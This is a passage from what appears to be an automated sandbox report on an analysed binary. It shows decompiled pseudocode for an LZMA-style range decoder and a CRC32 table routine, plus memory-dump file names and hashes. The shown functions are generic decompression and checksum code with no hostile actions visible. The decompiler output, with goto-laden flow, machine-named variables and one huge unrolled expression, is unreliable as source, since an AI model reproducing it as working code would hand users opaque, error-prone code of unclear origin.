                                                  												} else {
                                                  													_t295 = _t256;
                                                  													_t302 = _t302 + _t302;
                                                  												}
                                                  												_t172 = _v12;
                                                  												if(_t302 >= _t172) {
                                                  													_t303 = _t302 + _t344 - _t172;
                                                  													if(_v4 >= 4) {
                                                  														goto L32;
                                                  													} else {
                                                  														if(_t303 >= 3) {
                                                  															_t303 = 3;
                                                  														}
                                                  														_t173 = _a4;
                                                  														_t129 = _t303 + 1; // 0x4
                                                  														_t348 = (_t129 << 7) + _v16;
                                                  														_t304 = 1;
                                                  														do {
                                                  															_t215 =  *(_t348 + _t304 * 2) & 0x0000ffff;
                                                  															if(_t295 >= 0x1000000) {
                                                  																goto L91;
                                                  															} else {
                                                  																_t176 = _a4;
                                                  																if(_t176 >= _v20) {
                                                  																	goto L2;
                                                  																} else {
                                                  																	_t295 = _t295 << 8;
                                                  																	_t327 = _t327 << 0x00000008 |  *_t176 & 0x000000ff;
                                                  																	_t173 =  &(_t176[1]);
                                                  																	_a4 = _t173;
                                                  																	goto L91;
                                                  																}
                                                  															}
                                                  															goto L113;
                                                  															L91:
                                                  															_t259 = (_t295 >> 0xb) * _t215;
                                                  															if(_t327 >= _t259) {
                                                  																_t295 = _t295 - _t259;
                                                  																_t327 = _t327 - _t259;
                                                  																_t304 = _t304 + _t304 + 1;
                                                  															} else {
                                                  																_t295 = _t259;
                                                  																_t304 = _t304 + _t304;
                                                  															}
                                                  														} while (_t304 < 0x40);
                                                  														_t305 = _t304 - 0x40;
                                                  														if(_t305 < 4) {
                                                  															goto L33;
                                                  														} else {
                                                  															_t263 = (_t305 >> 1) - 1;
                                                  															_v12 = _t263;
                                                  															if(_t305 >= 0xe) {
                                                  																_t306 = _v20;
                                                  																_t264 = _t263 - 4;
                                                  																do {
                                                  																	if(_t295 >= 0x1000000) {
                                                  																		goto L102;
                                                  																	} else {
                                                  																		if(_t173 >= _t306) {
                                                  																			goto L2;
                                                  																		} else {
                                                  																			_t295 = _t295 << 8;
                                                  																			_t327 = _t327 << 0x00000008 |  *_t173 & 0x000000ff;
                                                  																			_t173 =  &(_t173[1]);
                                                  																			goto L102;
                                                  																		}
                                                  																	}
                                                  																	goto L113;
                                                  																	L102:
                                                  																	_t295 = _t295 >> 1;
                                                  																	_t327 = _t327 - ((_t327 - _t295 >> 0x0000001f) - 0x00000001 & _t295);
                                                  																	_t264 = _t264 - 1;
                                                  																} while (_t264 != 0);
                                                  																_t265 = _v16;
                                                  																_a4 = _t173;
                                                  																_v12 = 4;
                                                  																goto L104;
                                                  															} else {
                                                  																_t265 = _v16 + ((_t305 & 0x00000001 | 0x00000002) << _t263) * 2 - 0xd00;
                                                  																L104:
                                                  																_t349 = 1;
                                                  																_v16 = _t265;
                                                  																_t222 = 1;
                                                  																do {
                                                  																	_t267 =  *(_v16 + _t349 * 2) & 0x0000ffff;
                                                  																	if(_t295 >= 0x1000000) {
                                                  																		goto L108;
                                                  																	} else {
                                                  																		if(_a4 >= _v20) {
                                                  																			goto L2;
                                                  																		} else {
                                                  																			_t178 = _a4;
                                                  																			_t295 = _t295 << 8;
                                                  																			_t327 = _t327 << 0x00000008 |  *_t178 & 0x000000ff;
                                                  																			_t173 =  &(_t178[1]);
                                                  																			_a4 = _t173;
                                                  																			goto L108;
                                                  																		}
                                                  																	}
                                                  																	goto L113;
                                                  																	L108:
                                                  																	_t309 = (_t295 >> 0xb) * _t267;
                                                  																	if(_t327 >= _t309) {
                                                  																		_t222 = _t222 + _t222;
                                                  																		_t295 = _t295 - _t309;
                                                  																		_t327 = _t327 - _t309;
                                                  																		_t349 = _t349 + _t222;
                                                  																	} else {
                                                  																		_t349 = _t349 + _t222;
                                                  																		_t295 = _t309;
                                                  																		_t222 = _t222 + _t222;
                                                  																	}
                                                  																	_t155 =  &_v12;
                                                  																	 *_t155 = _v12 - 1;
                                                  																} while ( *_t155 != 0);
                                                  																goto L33;
                                                  															}
                                                  														}
                                                  													}
                                                  												} else {
                                                  													_t170 = _a4;
                                                  													continue;
                                                  												}
                                                  											} else {
                                                  												if(_t170 >= _v20) {
                                                  													goto L2;
                                                  												} else {
                                                  													_t295 = _t295 << 8;
                                                  													_t327 = _t327 << 0x00000008 |  *_t170 & 0x000000ff;
                                                  													_a4 =  &(_t170[1]);
                                                  													goto L79;
                                                  												}
                                                  											}
                                                  											goto L113;
                                                  										}
                                                  									}
                                                  								} else {
                                                  									if(_t237 >= _v20) {
                                                  										goto L2;
                                                  									} else {
                                                  										_t293 = _t293 << 8;
                                                  										_t325 = _t325 << 0x00000008 |  *_t237 & 0x000000ff;
                                                  										_a4 =  &(_t237[1]);
                                                  										goto L67;
                                                  									}
                                                  								}
                                                  							}
                                                  						} else {
                                                  							if(_t237 >= _v20) {
                                                  								goto L2;
                                                  							} else {
                                                  								_t289 = _t289 << 8;
                                                  								_t324 = _t324 << 0x00000008 |  *_t237 & 0x000000ff;
                                                  								_t237 =  &(_t237[1]);
                                                  								_a4 = _t237;
                                                  								goto L39;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t296 = _t162;
                                                  						_v16 = _v16 + 0x280;
                                                  						if(_t297[0x2c] != 0 || _t297[0x28] != 0) {
                                                  							_t279 = _t297[0x18];
                                                  							if(_t279 == 0) {
                                                  								_t279 = _t297[0x14];
                                                  							}
                                                  							_v16 = _v16 + ((( *(_t297[0x10] + _t279 - 1) & 0x000000ff) >> 8 - ( *_t297 & 0x000000ff)) + (((0x00000001 << _t297[1]) - 0x00000001 & _t297[0x28]) << ( *_t297 & 0x000000ff))) * 0x600;
                                                  						}
                                                  						if(_t342 >= 7) {
                                                  							_t284 = _t297[0x18];
                                                  							_t228 = _t297[0x30];
                                                  							if(_t284 >= _t228) {
                                                  								_t191 = 0;
                                                  							} else {
                                                  								_t191 = _t297[0x14];
                                                  							}
                                                  							_t229 =  *(_t297[0x10] - _t228 + _t284 + _t191) & 0x000000ff;
                                                  							_t321 = 0x100;
                                                  							_t285 = 1;
                                                  							do {
                                                  								_t192 = _t321;
                                                  								_t229 = _t229 + _t229;
                                                  								_v4 = _t192;
                                                  								_t321 = _t321 & _t229;
                                                  								_v12 =  *(_v16 + (_t192 + _t285 + _t321) * 2) & 0x0000ffff;
                                                  								if(_t296 >= 0x1000000) {
                                                  									goto L27;
                                                  								} else {
                                                  									_t199 = _a4;
                                                  									if(_t199 >= _v20) {
                                                  										goto L2;
                                                  									} else {
                                                  										_t296 = _t296 << 8;
                                                  										_t323 = _t323 << 0x00000008 |  *_t199 & 0x000000ff;
                                                  										_a4 =  &(_t199[1]);
                                                  										goto L27;
                                                  									}
                                                  								}
                                                  								goto L113;
                                                  								L27:
                                                  								_t198 = (_t296 >> 0xb) * _v12;
                                                  								if(_t323 >= _t198) {
                                                  									_t296 = _t296 - _t198;
                                                  									_t323 = _t323 - _t198;
                                                  									_t285 = _t285 + _t285 + 1;
                                                  								} else {
                                                  									_t285 = _t285 + _t285;
                                                  									_t321 = _t321 ^ _v4;
                                                  									_t296 = _t198;
                                                  								}
                                                  							} while (_t285 < 0x100);
                                                  							goto L31;
                                                  						} else {
                                                  							_t286 = 1;
                                                  							do {
                                                  								_t322 =  *(_v16 + _t286 * 2) & 0x0000ffff;
                                                  								if(_t296 >= 0x1000000) {
                                                  									goto L15;
                                                  								} else {
                                                  									_t205 = _a4;
                                                  									if(_t205 >= _v20) {
                                                  										goto L2;
                                                  									} else {
                                                  										_t296 = _t296 << 8;
                                                  										_t323 = _t323 << 0x00000008 |  *_t205 & 0x000000ff;
                                                  										_a4 =  &(_t205[1]);
                                                  										goto L15;
                                                  									}
                                                  								}
                                                  								goto L113;
                                                  								L15:
                                                  								_t204 = (_t296 >> 0xb) * _t322;
                                                  								if(_t323 >= _t204) {
                                                  									_t296 = _t296 - _t204;
                                                  									_t323 = _t323 - _t204;
                                                  									_t286 = _t286 + _t286 + 1;
                                                  								} else {
                                                  									_t296 = _t204;
                                                  									_t286 = _t286 + _t286;
                                                  								}
                                                  							} while (_t286 < 0x100);
                                                  							L31:
                                                  							_v8 = 1;
                                                  							L32:
                                                  							_t173 = _a4;
                                                  							L33:
                                                  							if(_t295 >= 0x1000000 || _t173 < _v20) {
                                                  								return _v8;
                                                  							} else {
                                                  								goto L2;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t207 = _a4;
                                                  					if(_t207 < _v20) {
                                                  						_t288 = _t288 << 8;
                                                  						_t323 = _t323 << 0x00000008 |  *_t207 & 0x000000ff;
                                                  						_a4 =  &(_t207[1]);
                                                  						goto L4;
                                                  					} else {
                                                  						L2:
                                                  						return 0;
                                                  					}
                                                  				}
                                                  				L113:
                                                  			}


                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.230475280.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.230471949.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230642928.0000000010171000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230693439.00000000101CE000.00000002.00020000.sdmp
                                                  • Associated: 00000001.00000002.230767992.0000000010289000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.230780419.000000001028B000.00000008.00020000.sdmp
                                                  • Associated: 00000001.00000002.231392398.0000000010401000.00000004.00020000.sdmp
                                                  • Associated: 00000001.00000002.231410757.0000000010409000.00000002.00020000.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                  • Instruction ID: 716e8680d2defe3bfc55e8fd9abbacc65e697d5aafa8aa152ded289f5cb66b27
                                                  • Opcode Fuzzy Hash: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                  • Instruction Fuzzy Hash: B5024632A083518BD709CE28C49425DBBE2FBC4344F264B3DE896D7B94D774E988CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E10040780() {
                                                  				void* __esi;
                                                  				void* _t43;
                                                  				void* _t45;
                                                  				signed int _t71;
                                                  				unsigned int _t83;
                                                  				void* _t84;
                                                  
                                                  				_t83 = 0;
                                                  				do {
                                                  					 *(0x104060e0 + _t83 * 4) =  ~(( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 
0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 
0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( 
~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 
^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( 
~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 
0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) & 0x00000001) & 0xedb88320 ^ ( ~(_t83 & 0x00000001) & 0xedb88320 ^ _t83 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001;
                                                  					_t83 = _t83 + 1;
                                                  				} while (_t83 < 0x100);
                                                  				_t43 = 0x104060e4;
                                                  				_t84 = 0x1c0;
                                                  				do {
                                                  					_t71 =  *(_t43 - 4);
                                                  					_t43 = _t43 + 0x10;
                                                  					 *(_t43 + 0x3ec) = _t71 >> 0x00000008 ^  *(0x104060e0 + (_t71 & 0x000000ff) * 4);
